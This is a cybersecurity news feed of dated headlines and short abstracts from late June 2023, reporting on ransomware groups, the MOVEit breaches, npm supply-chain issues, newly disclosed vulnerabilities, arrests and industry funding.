Electromagnetic fault injection (EMFI) attacks on drones can potentially allow attackers to achieve arbitrary code execution and take over them. While the use of drones continues to grow, researchers from IOActive analyzed how to develop fault injection...Security Affairs
June 28, 2023 – Vulnerabilities
Exploit released for new Arcserve UDP auth bypass vulnerability Full Text
Abstract
Data protection vendor Arcserve has addressed a high-severity security flaw in its Unified Data Protection (UDP) backup software that can let attackers bypass authentication and gain admin privileges.BleepingComputer
June 28, 2023 – Vulnerabilities
Numerous Devices Discovered Violating CISA’s BOD Full Text
Abstract
Censys has recently analyzed the attack surfaces of over 50 FCEB organizations and detected several hundred devices to be publicly exposed to a variety of cybersecurity threats. They are not secured according to CISA’s latest Binding Operational Directive (BOD). Moreover, software programs suc...Cyware
June 28, 2023 – Criminals
CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million Full Text
Abstract
Cybersecurity researchers have exposed the workings of a scam ring called CryptosLabs that's estimated to have made €480 million in illegal profits by targeting French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate's massive fake investment schemes primarily involve impersonating 40 well-known banks, fin-techs, asset management firms, and crypto platforms, setting up a scam infrastructure spanning over 350 domains hosted on more than 80 servers, Group-IB said in a deep-dive report. The Singapore-headquartered company described the criminal outfit as "operated by a hierarchy of kingpins, sales agents, developers, and call center operators" who are recruited to ensnare potential victims by promising high returns on their capital. "CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, sociaThe Hacker News
June 28, 2023 – General
Experts warn of a spike in May and June of 8Base ransomware attacks Full Text
Abstract
Researchers warn of a massive spike in May and June 2023 of the activity associated with the ransomware group named 8Base. VMware Carbon Black researchers observed an intensification of the activity associated with a stealthy ransomware group named 8Base....Security Affairs
June 28, 2023 – Ransomware
Linux version of Akira ransomware targets VMware ESXi servers Full Text
Abstract
The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide.BleepingComputer
June 28, 2023 – Business
Astrix Security, which uses ML to secure app integrations, raises $25M Full Text
Abstract
Astrix Security, a platform that helps companies manage and secure third-party app integrations, today announced that it closed a $25 million Series A funding round led by CRV with participation from Bessemer Venture Partners and F2 Venture Capital.Cyware
June 28, 2023 – Education
5 Things CISOs Need to Know About Securing OT Environments Full Text
Abstract
For too long the cybersecurity world focused exclusively on information technology (IT), leaving operational technology (OT) to fend for itself. Traditionally, few industrial enterprises had dedicated cybersecurity leaders. Any security decisions that arose fell to the plant and factory managers, who are highly skilled technical experts in other areas but often lack cybersecurity training or knowledge. In more recent years, an uptick in cyberattacks against industrial facilities and the trend of IT/OT convergence driven by Industry 4.0 have highlighted the vacuum of ownership around OT security. According to a new Fortinet report , most organizations are looking to Chief Information Security Officers (CISOs) to solve the problem. Fortunately, CISOs are no strangers to change or difficult challenges. The position itself is less than 20 years old, yet in those two decades CISOs have navigated some of the most disruptive cybersecurity events that were truly watershed moments in technoThe Hacker News
June 28, 2023 – Vulnerabilities
Critical SQL Injection flaws in Gentoo Soko can lead to Remote Code Execution Full Text
Abstract
SQL injection vulnerabilities in Gentoo Soko could lead to remote code execution (RCE) on impacted systems. SonarSource researchers discovered two SQL injection vulnerabilities in Gentoo Soko, collectively tracked as CVE-2023-28424 (CVSS score: 9.1)...Security Affairs
June 28, 2023 – Solution
Brave Browser boosts privacy with new local resources restrictions Full Text
Abstract
The Brave team has announced that the privacy-centric browser will soon introduce new restriction controls allowing users to specify how long sites can access local network resources.BleepingComputer
June 28, 2023 – Vulnerabilities
NPM Registry Found to be Vulnerable to ‘Manifest Confusion’ Abuse Full Text
Abstract
The npm Public Registry, a database of JavaScript packages, fails to compare npm package manifest data with the archive of files that data describes, creating an opportunity for the installation and execution of malicious files.Cyware
June 28, 2023 – Ransomware
8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses Full Text
Abstract
A ransomware threat called 8Base that has been operating under the radar for over a year has been attributed to a "massive spike in activity" in May and June 2023. "The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms," VMware Carbon Black researchers Deborah Snyder and Fae Carlisle said in a report shared with The Hacker News. "8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries." 8Base, according to statistics gathered by Malwarebytes and NCC Group, has been linked to 67 attacks as of May 2023, with about 50% of the victims operating in the business services, manufacturing, and construction sectors. A majority of the targeted companies are located in the U.S. and Brazil. With very little known about the operators of the ransomware, its origins remain something of a cipher. What's evident is that it has been active sincThe Hacker News
June 28, 2023 – Criminals
EncroChat dismantling led to 6,558 arrests and the seizure of $979M in criminal funds Full Text
Abstract
Europol announced that the takedown of the EncroChat encrypted chat network has led to the arrest of 6,558 people and the seizure of $979 million in illicit funds. Europol announced that the dismantling of the encrypted chat network EncroChat has led to the arrest...Security Affairs
June 28, 2023 – Vulnerabilities
NPM ecosystem at risk from “Manifest Confusion” attacks Full Text
Abstract
The NPM (Node Package Manager) registry suffers from a security lapse called "manifest confusion," which undermines the trustworthiness of packages and makes it possible for attackers to hide malware in dependencies or perform malicious script execution during installation.BleepingComputer
June 28, 2023 – Phishing
Ukraine Cracks Down on Investment Scams, Raids Call Centers Full Text
Abstract
Ukrainian cyber police raided and closed over a dozen fraudulent call centers last week, saying the operations were running fake investment scams that involved stealing cryptocurrency and payment card details from European and Central Asian citizens.Cyware
June 28, 2023 – Vulnerabilities
Critical SQL Injection Flaws Expose Gentoo Soko to Remote Code Execution Full Text
Abstract
Multiple SQL injection vulnerabilities have been disclosed in Gentoo Soko that could lead to remote code execution (RCE) on vulnerable systems. "These SQL injections happened despite the use of an Object-Relational Mapping (ORM) library and prepared statements," SonarSource researcher Thomas Chauchefoin said, adding they could result in RCE on Soko because of a "misconfiguration of the database." The two issues, which were discovered in the search feature of Soko, have been collectively tracked as CVE-2023-28424 (CVSS score: 9.1). They were addressed within 24 hours of responsible disclosure on March 17, 2023. Soko is a Go software module that powers packages.gentoo.org, offering users an easy way to search through different Portage packages that are available for the Gentoo Linux distribution. But the shortcomings identified in the service meant that it could have been possible for a malicious actor to inject specially crafted code, resulting in the expoThe Hacker News
June 28, 2023 – General
The Current State of Business Email Compromise Attacks Full Text
Abstract
Business Email Compromise (BEC) poses a growing threat to businesses of all sizes. Learn more from Specops Software about the types of BEC attacks and how to avoid them.BleepingComputer
June 28, 2023 – Breach
Victim Count in Ransomware Attack at Maryland Healthcare Provider Jumps Fivefold to 137,000 Full Text
Abstract
A Berlin, Maryland-based hospital recently told regulators that a ransomware breach discovered in January had compromised the sensitive information of nearly 137,000 patients, about five times the number of people originally estimated to be affected.Cyware
June 28, 2023 – Criminals
8Base ransomware gang escalates double extortion attacks in June Full Text
Abstract
The 8Base ransomware gang is targeting organizations worldwide in double-extortion attacks, with a steady stream of new victims since the beginning of June.BleepingComputer
June 28, 2023 – Business
Cyera Raises $100M to Bring Data Protection to Hybrid Cloud Full Text
Abstract
The startup, founded by longtime Israeli Military Intelligence leaders, landed the Accel-led $100 million Series B funding to support the cloud and on-premises data protection needs of hybrid organizations.Cyware
June 28, 2023 – Policy and Law
SolarWinds says SEC investigation ‘progressing to charges’ Full Text
Abstract
SolarWinds — the technology firm at the center of a December 2020 hack that affected multiple U.S. government agencies — said its executives may soon face charges from the Securities and Exchange Commission (SEC) for its response to the incident.Cyware
June 28, 2023 – Government
UAE, Israel create ‘Crystal Ball’ platform to fight hackers Full Text
Abstract
The mission is to “design, deploy and enable regional intelligence enhancement” through collaboration and knowledge-sharing to combat national-level cyberthreats, according to a presentation by Mohamed Al Kuwaiti, UAE head of cybersecurity.Cyware
June 27, 2023 – Breach
Siemens Energy confirms data breach after MOVEit data-theft attack Full Text
Abstract
Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform.BleepingComputer
June 27, 2023 – Policy and Law
Hundreds of devices found violating new CISA federal agency directive Full Text
Abstract
Censys researchers have discovered hundreds of Internet-exposed devices on the networks of U.S. federal agencies that have to be secured according to a recently issued CISA Binding Operational Directive.BleepingComputer
June 27, 2023 – Criminals
EncroChat takedown led to 6,500 arrests and $979 million seized Full Text
Abstract
Europol announced today that the takedown of the EncroChat encrypted mobile communications platform has led to the arrest of over 6,600 people and the seizure of $979 million in illicit funds.BleepingComputer
June 27, 2023 – General
Just released: Session tracks for Mandiant’s 2023 mWISE event Full Text
Abstract
There are just a few days left to get the lowest price available for the mWISE cybersecurity conference. It runs from September 18 - 20, 2023 in Washington, DC. If you register now, you'll get 45% off the standard conference rate.BleepingComputer
June 27, 2023 – Malware
New Mockingjay process injection technique evades EDR detection Full Text
Abstract
A new process injection technique named 'Mockingjay' could allow threat actors to bypass EDR (Endpoint Detection and Response) and other security products to stealthily execute malicious code on compromised systems.BleepingComputer
June 27, 2023 – Malware
Hackers Steal Messages, Call Logs, and Locations Intercepted by Phone Monitoring App Full Text
Abstract
The phone monitoring app, which is used to spy on thousands of people using Android phones, said in a notice on its login page that on June 21, “a security incident occurred involving obtaining unauthorized access to the data of website users.”Cyware
June 27, 2023 – Malware
New Mockingjay Process Injection Technique Could Let Malware Evade Detection Full Text
Abstract
A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido Naor said in a report shared with The Hacker News. "The uniqueness of this technique is that it requires a vulnerable DLL and copying code to the right section." Process injection is an attack method that allows adversaries to inject code into processes in order to evade process-based defenses and elevate privileges. In doing so, it could allow for the execution of arbitrary code in the memory space of a separate live process. Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, amonThe Hacker News
June 27, 2023 – Malware
Mockingjay process injection technique allows EDR bypass Full Text
Abstract
Mockingjay is a new process injection technique that can be exploited to bypass security solutions to execute malware on compromised systems. A new process injection technique dubbed Mockingjay can be exploited by attackers to bypass security controls...Security Affairs
June 27, 2023 – Vulnerabilities
Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text
Abstract
Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch (FCEB) organizations and sub-organizations and discovered more than 13,000 distinct hosts across 100 autonomous systems.Cyware
June 27, 2023 – Attack
New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain Full Text
Abstract
Cybersecurity researchers have discovered a new ongoing campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems. "The packages in question seem to be published in pairs, each pair working in unison to fetch additional resources which are subsequently decoded and/or executed," software supply chain security firm Phylum said in a report released last week. To that end, the order in which the pair of packages are installed is paramount to pulling off a successful attack, as the first of the two modules are designed to store locally a token retrieved from a remote server. The campaign was first discovered on June 11, 2023. The second package subsequently passes this token as a parameter alongside the operating system type to an HTTP GET request to acquire a second script from the remote server. A successful execution returns a Base64-encoded string that is immediately executed but only if that string isThe Hacker News
June 27, 2023 – Government
Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text
Abstract
Researchers at Censys have identified hundreds of devices deployed within federal networks that have internet-exposed management interfaces. Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch...Security Affairs
June 27, 2023 – Attack
Senior Choice, Inc. Provides Notice of Security Incident Full Text
Abstract
The company, which manages three residential facilities in Pennsylvania, discovered suspicious activity in its internal systems used for business operations and immediately implemented measures to contain the situation.Cyware
June 27, 2023 – Solution
Beyond Asset Discovery: How Attack Surface Management Prioritizes Vulnerability Remediation Full Text
Abstract
As the business environment becomes increasingly connected, organizations' attack surfaces continue to expand, making it challenging to map and secure both known and unknown assets. In particular, unknown assets present security challenges related to shadow IT, misconfigurations, ineffective scan coverage, among others. Given attack surface sprawl and evolving threats, many organizations are embracing attack surface management (ASM) tools to discover and address critical exposures. Asset discovery is an important capability to have, and one that's helping to drive the adoption of attack surface management tools and services. That said, asset discovery is only one aspect of effective attack surface management. Making the attack surface as impenetrable as possible takes offensive security that goes far beyond the discovery phase. Why Asset Discovery Isn't Enough: Given the complexity and ever-expanding scale of the digital infrastructure at most companies, cataloging all the knownThe Hacker News
June 27, 2023 – Attack
Schneider Electric and Siemens Energy are two more victims of a MOVEit attack Full Text
Abstract
Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial...Security Affairs
June 27, 2023 – Business
Socure Buys Berbix for $70M to Fortify Identity Verification Full Text
Abstract
The Nevada-based identity verification company said the acquisition of San Francisco-based Berbix will help it optimize the digital capturing and back-end processing of driver's licenses and passports at faster speeds and with greater accuracy.Cyware
June 27, 2023 – Criminals
EncroChat Bust Leads to 6,558 Criminals’ Arrests and €900 Million Seizure Full Text
Abstract
Europol on Tuesday announced that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The law enforcement agency said that a subsequent joint investigation initiated by French and Dutch authorities intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform between no less than 60,000 users. Now almost three years later, the information obtained from digital correspondence has resulted in: arrests of 6,558 suspects, including 197 high-value targets; 7,134 years of imprisonment for convicted criminals; confiscation of €739.7 million in cash; €154.1 million frozen in assets or bank accounts; seizure of 30.5 million pills of chemical drugs; seizure of 103.5 tonnes of cocaine, 163.4 tonnes of cannabis, and 3.3 tonnes of heroin; seizure of 971 vehicles, 83 boats, and 40 planes; seizure of 271 estates or homes; and seizure of 923 weapons, as wellThe Hacker News
June 27, 2023 – Cryptocurrency
JOKERSPY used to target a cryptocurrency exchange in Japan Full Text
Abstract
An unnamed Japanese cryptocurrency exchange was the victim of a cyber attack aimed at deploying an Apple macOS backdoor named JokerSpy. Elastic Security Labs researchers provided details about a recently discovered intrusion at an unnamed cryptocurrency...Security Affairs
June 27, 2023 – Breach
Schneider Electric and Siemens Energy Among the Latest Victims of MOVEit Zero-Day Attacks Full Text
Abstract
The Cl0p ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial control systems giants Schneider Electric and Siemens Energy.Cyware
June 27, 2023 – Malware
Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland Full Text
Abstract
A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023. "The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric said in an analysis published Monday. The Dutch cybersecurity company said Anatsa-infected Google Play Store dropper apps have accrued over 30,000 installations to date, indicating that the official app storefront has become an effective distribution vector for the malware. Anatsa, also known by the names TeaBot and Toddler, first emerged in early 2021, and has been observed masquerading as seemingly innocuous utility apps like PDF readers, QR code scanners, and two-factor authentication (2FA) apps on Google Play to siphon users' credentials. It has since become one oThe Hacker News
June 27, 2023 – Business
CalypsoAI Raises $23 Million for AI Security Tech Full Text
Abstract
The company, founded by DARPA, NASA, and DoD veterans, said the Series A-1 financing was led by Paladin Capital Group. Existing investors including Lockheed Martin Ventures, new investors Hakluyt Capital and Expeditions Fund, also took part.Cyware
June 27, 2023 – Vulnerabilities
New Fortinet’s FortiNAC Vulnerability Exposes Networks to Code Execution Attacks Full Text
Abstract
Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code. Tracked as CVE-2023-33299, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization. "A deserialization of untrusted data vulnerability [CWE-502] in FortiNAC may allow an unauthenticated user to execute unauthorized code or commands via specifically crafted requests to the tcp/1050 service," Fortinet said in an advisory published last week. The shortcoming impacts the following products, with patches available in FortiNAC versions 7.2.2, 9.1.10, 9.2.8, and 9.4.3 or later: FortiNAC version 9.4.0 through 9.4.2; FortiNAC version 9.2.0 through 9.2.7; FortiNAC version 9.1.0 through 9.1.9; FortiNAC version 7.2.0 through 7.2.1; FortiNAC 8.8 all versions; FortiNAC 8.7 all versions; FortiNAC 8.6 all vThe Hacker News
June 27, 2023 – Vulnerabilities
Chrome 114 Update Patches High-Severity Vulnerabilities Full Text
Abstract
Google this week announced a new Chrome 114 update that patches a total of four vulnerabilities, including three high-severity bugs reported by external security researchers.Cyware
June 27, 2023 – Hacker
The potent cyber adversary threatening to further inflame Iranian politics Full Text
Abstract
The latest hack claimed by GhyamSarnegouni demonstrates the depth of information that hackers and hacktivists are accessing in Iran's internal politics, with potentially significant implications for national security.Cyware
June 26, 2023 – Outage
Sweetwater Union High School District confirms data breach caused outages in February Full Text
Abstract
The district says their investigation determined in mid-May that some personal information from current and former employees, their dependents, students, and families, was potentially accessed by attackers from the district's network.Cyware
June 26, 2023 – Education
Researchers Find Way to Recover Cryptographic Keys by Analyzing LED Flickers Full Text
Abstract
In what's an ingenious side-channel attack, a group of academics has found that it's possible to recover secret keys from a device by analyzing video footage of its power LED. "Cryptographic computations performed by the CPU change the power consumption of the device which affects the brightness of the device's power LED," researchers from the Ben-Gurion University of the Negev and Cornell University said in a study. By taking advantage of this observation, it's possible for threat actors to leverage video camera devices such as an iPhone 13 or an internet-connected surveillance camera to extract the cryptographic keys from a smart card reader. Specifically, video-based cryptanalysis is accomplished by obtaining video footage of rapid changes in an LED's brightness and exploiting the video camera's rolling shutter effect to capture the physical emanations. "This is caused by the fact that the power LED is connected directly to the powThe Hacker News
June 26, 2023 – Policy and Law
Citizen of Croatia charged with running the Monopoly Market drug marketplace Full Text
Abstract
Milomir Desnica, a citizen of Croatia and Serbia, has been charged with running the Monopoly Market drug darknet marketplace. Milomir Desnica (33), a citizen of Croatia and Serbia, has been extradited from Austria to the United States to face charges...Security Affairs
June 26, 2023 – Breach
MOVEit Breach Exposes Sensitive Data on New York City Public Schools Full Text
Abstract
A MOVEit cyberattack has exposed sensitive data on around 45 thousand New York City Public School students - as well as Department of Education staff and service providers.Cyware
June 26, 2023 – Attack
Japanese Cryptocurrency Exchange Falls Victim to JokerSpy macOS Backdoor Attack Full Text
Abstract
An unknown cryptocurrency exchange located in Japan was the target of a new attack earlier this month to deploy an Apple macOS backdoor called JokerSpy. Elastic Security Labs, which is monitoring the intrusion set under the name REF9134, said the attack led to the installation of Swiftbelt, a Swift-based enumeration tool inspired by an open-source utility called SeatBelt. JokerSpy was first documented by Bitdefender last week, describing it as a sophisticated toolkit designed to breach macOS machines. Very little is known about the threat actor behind the operation other than the fact that the attacks leverage a set of programs written in Python and Swift that come with capabilities to gather data and execute arbitrary commands on compromised hosts. A primary component of the toolkit is a self-signed multi-architecture binary known as xcc that's engineered to check for FullDiskAccess and ScreenRecording permissions. The file is signed as XProtectCheck, indicating anThe Hacker News
June 26, 2023 – Attack
Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada Full Text
Abstract
The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada's leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas,...Security Affairs
June 26, 2023 – Criminals
Cybercriminals target high-profit companies: AEI Full Text
Abstract
Cybercriminals tend to strike highly profitable companies, those holding abundant cash, and organizations that spend generously on advertising, according to an American Enterprise Institute study of cyberattacks from January 1999 until January 2022.Cyware
June 26, 2023 – Education
How Generative AI Can Dupe SaaS Authentication Protocols — And Effective Ways To Prevent Other Key AI Risks in SaaS Full Text
Abstract
Security and IT teams are routinely forced to adopt software before fully understanding the security risks. And AI tools are no exception. Employees and business leaders alike are flocking to generative AI software and similar programs, often unaware of the major SaaS security vulnerabilities they're introducing into the enterprise. A February 2023 generative AI survey of 1,000 executives revealed that 49% of respondents use ChatGPT now, and 30% plan to tap into the ubiquitous generative AI tool soon. Ninety-nine percent of those using ChatGPT claimed some form of cost-savings, and 25% attested to reducing expenses by $75,000 or more. As the researchers conducted this survey a mere three months after ChatGPT's general availability, today's ChatGPT and AI tool usage is undoubtedly higher. Security and risk teams are already overwhelmed protecting their SaaS estate (which has now become the operating system of business) from common vulnerabilities such as misconfiguratiThe Hacker News
June 26, 2023 – Vulnerabilities
Internet Systems Consortium (ISC) fixed three DoS flaws in BIND Full Text
Abstract
The Internet Systems Consortium (ISC) addressed three denial-of-service (DoS) vulnerabilities in the DNS software suite BIND. The Internet Systems Consortium (ISC) released security updates to address three denial-of-service (DoS) vulnerabilities...Security Affairs
June 26, 2023 – Botnet
Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign Full Text
Abstract
Unit 42 researchers uncovered a modified version of the Mirai botnet that is actively abusing at least 22 security flaws in devices manufactured by the likes of D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The attackers aim to take control of these devices and utilize them to carry ...Cyware
June 26, 2023 – Attack
Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers Full Text
Abstract
Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard. The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said. Midnight Blizzard, formerly known as Nobelium, is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes. The group, which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities. It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area. "These credential attacks usThe Hacker News
June 26, 2023
China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks Full Text
Abstract
China-linked APT group VANGUARD PANDA, aka Volt Typhoon, was spotted using novel tradecraft to gain initial access to target networks. CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel...Security Affairs
June 26, 2023 – Outage
Activision Blizzard Games Crippled by Hours-Long DDoS Attack Full Text
Abstract
The attack lasted for more than 10 hours and was mitigated late on Sunday, according to Activision Blizzard’s statement on Twitter. Blizzard has not yet identified the hacker group behind it and no one has yet come forward to claim responsibility.Cyware
June 26, 2023 – Hacker
Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks Full Text
Abstract
The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda. "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said. Volt Typhoon, also known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S. government, defense, and other critical infrastructure organizations. An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools againstThe Hacker News
June 26, 2023 – Ransomware
An Overview of the Different Versions of the Trigona Ransomware Full Text
Abstract
Trigona ransomware is a relatively new family that targets compromised MSSQL servers and has been detected mainly in the technology and healthcare industries in countries such as the US, India, and Israel.Cyware
June 26, 2023 – General
Congress needs ‘private sector buy-in’ to address cyber workforce shortage Full Text
Abstract
Organizations are working to educate and train the next generation of professionals to fill critical cybersecurity vacancies, but private sector firms need to change their hiring practices to integrate this pool of talent into the workforce.Cyware
June 26, 2023 – Malware
Trojanized Super Mario Bros game spreads malware Full Text
Abstract
Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows...Security Affairs
June 25, 2023 – Policy and Law
Twitter hacker sentenced to five years in prison for cybercrime offenses Full Text
Abstract
A U.K. citizen, who was involved in the attack on Twitter in 2020, was sentenced to five years in prison for cybercrime offenses. Joseph James O'Connor, aka PlugwalkJoe (24), the hacker who was involved in the attacks on Twitter in 2020, was sentenced...Security Affairs
June 25, 2023 – General
Security Affairs newsletter Round 425 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Someone...Security Affairs
June 24, 2023 – Vulnerabilities
US Military Personnel Targeted by Unsolicited Smartwatches Linked to Data Breaches Full Text
Abstract
Recent reports indicate that these seemingly innocuous devices, once activated, automatically connect to Wi-Fi networks and establish unauthorized connections with users’ cell phones, potentially exposing sensitive personal data.Cyware
June 24, 2023 – Government
U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel devices (CVE-2023-27992). CVE-2023-32434 and CVE-2023-32435, both of which allow code execution, are said to have been exploited as zero-days to deploy spyware as part of a years-long cyber espionage campaign that commenced in 2019. Dubbed Operation Triangulation, the activity culminates in the deployment of TriangleDB that's designed to harvest a wide range of information from compromised devices, such as creating, modifying, removing, and stealing files, listing and terminating processes, gathering credentials from iCloud Keychain, and tracking a user's location. TheThe Hacker News
June 24, 2023 – Botnet
Researcher Identifies Popular Swing VPN Android App as DDoS Botnet Full Text
Abstract
Swing VPN is a legitimate VPN app developed for Android and iOS systems by Limestone Software Solutions. However, according to researcher Lecromee, the Android version of this app is a DDoS botnet and allegedly harbors malicious intent.Cyware
June 24, 2023 – Criminals
Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam Full Text
Abstract
A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S. Joseph James O'Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021. The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about $120,000 in illegal profits. "In other instances, the co-conspirators sold access to Twitter accounts to others," the U.S. Department of Justice (DoJ) said. "O'Connor communicated with others regarding purchasing unauthorized access to a variety of Twitter accounts, including accounts associated with public figures around the world." The defendant has also been accused oThe Hacker News
June 24, 2023 – Government
Someone is sending mysterious smartwatches to the US Military personnel Full Text
Abstract
U.S. Army’s Criminal Investigation Division warns that US military personnel have reported receiving unsolicited smartwatches in the mail. The U.S. Army’s Criminal Investigation Division reported that service members across the military received...Security Affairs
June 23, 2023 – Breach
2.5 million Genworth policyholders affected by MOVEit hack Full Text
Abstract
A third-party vendor lost the personal data of at least 2.5 million Genworth Financial policyholders, including Social Security numbers, to the Russian Cl0p ransomware gang, according to the Fortune 500 insurer.Cyware
June 23, 2023 – Criminals
Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering Full Text
Abstract
A threat actor known as Muddled Libra is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access. "The attack style defining Muddled Libra appeared on the cybersecurity radar in late 2022 with the release of the 0ktapus phishing kit, which offered a prebuilt hosting framework and bundled templates," Palo Alto Networks Unit 42 said in a technical report. Libra is the designation given by the cybersecurity company for cybercrime groups. The "muddled" moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework. 0ktapus, also known as Scatter Swine, refers to an intrusion set that first came to light in August 2022 in connection with smishing attacks against over 100 organizations, including Twilio and Cloudflare. Then in late 2022, CrowdStrike detailed a string of cyber assaults aimed at telecom and BPO coThe Hacker News
June 23, 2023 – Solution
A New Kill Chain Approach to Disrupting Online Threats Full Text
Abstract
The defender community has learned a great deal since the 2016 U.S. election, but it still needs to find a common language.Lawfare
June 23, 2023 – Government
CISA orders govt agencies to fix recently disclosed flaws in Apple devices Full Text
Abstract
U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new security flaws to its Known...Security Affairs
June 23, 2023 – Business
Google announces $20 million investment for cyber clinics Full Text
Abstract
By deploying students to community organizations to improve digital defenses, university cybersecurity clinics aim to give students cybersecurity experience, improve local defensive capacity and steer students toward work in cybersecurity.Cyware
June 23, 2023 – Education
The Power of Browser Fingerprinting: Personalized UX, Fraud Detection, and Secure Logins Full Text
Abstract
The case for browser fingerprinting: personalizing user experience, improving fraud detection, and optimizing login security Have you ever heard of browser fingerprinting? You should! It's an online user identification technique that collects information about a visitor's web browser and its configuration preferences to associate individual browsing sessions with a single website visitor. With browser fingerprinting, many pieces of data can be collected about a user's web browser and device, such as screen resolution, location, language, and operating system. When you stitch these pieces together, they reveal a unique combination of information that forms every user's visitor ID or "digital fingerprint." Websites can use the visitor ID in various ways, including personalizing the user's experience, improving fraud detection, and optimizing login security. This article discusses the case for browser fingerprinting and how to use it safely on your websiThe Hacker News
June 23, 2023 – Vulnerabilities
VMware fixed five memory corruption issues in vCenter Server Full Text
Abstract
VMware addressed multiple memory corruption vulnerabilities in vCenter Server that can be exploited to achieve remote code execution. VMware released security updates to address five memory corruption vulnerabilities (CVE-2023-20892, CVE-2023-20893, CVE-2023-20894,...Security Affairs
June 23, 2023 – Policy and Law
MOVEit Data Breach Victims Sue Progress Software Full Text
Abstract
Fallout for Progress Software continues over a massive data breach that appears to have affected hundreds of private and public sector organizations that use its MOVEit file transfer software.Cyware
June 23, 2023 – Malware
Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware Full Text
Abstract
